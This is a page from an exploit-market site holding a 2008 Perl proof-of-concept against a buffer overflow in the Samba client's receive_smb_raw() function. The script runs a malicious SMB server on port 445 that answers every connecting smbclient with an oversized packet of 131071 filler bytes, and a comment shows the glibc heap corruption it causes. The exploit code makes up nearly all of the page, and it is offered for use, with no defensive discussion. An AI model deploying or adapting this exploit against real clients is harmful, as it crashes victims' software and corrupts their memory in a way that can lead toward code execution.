[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC

Author
Guido Landi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6547
Category
dos / poc
Date add
31-05-2008
Platform
multiple
==================================================================
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC
==================================================================




#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}



#  0day.today [2024-07-05]  #